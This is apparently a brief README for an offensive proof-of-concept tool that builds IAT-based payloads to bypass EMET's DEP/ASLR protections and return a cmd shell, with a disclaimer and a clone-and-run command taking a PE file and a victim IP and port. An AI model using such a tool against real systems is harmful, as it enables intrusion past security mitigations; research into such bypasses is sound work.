Notice: This Tools and Post For Education/Learning and Research Purpose ONLY!
IAT_POC; Find a suitable IAT based payload, that bypasses post DEP/ASLR protectsion in EMET.
Dependencies:
+ Python 2.7.x
+ pefile
Warning
There is no exit function, you’ll get a cmd shell back, but there will be a crash. This was done by design – write your own exit function.
use:
git clone https://github.com/ShellcodeSmuggler/IAT_POC && cd IAT_POC ./iat_poc.py ./iat_poc.py <your PE File> <your victim IP Address and port> win10 True True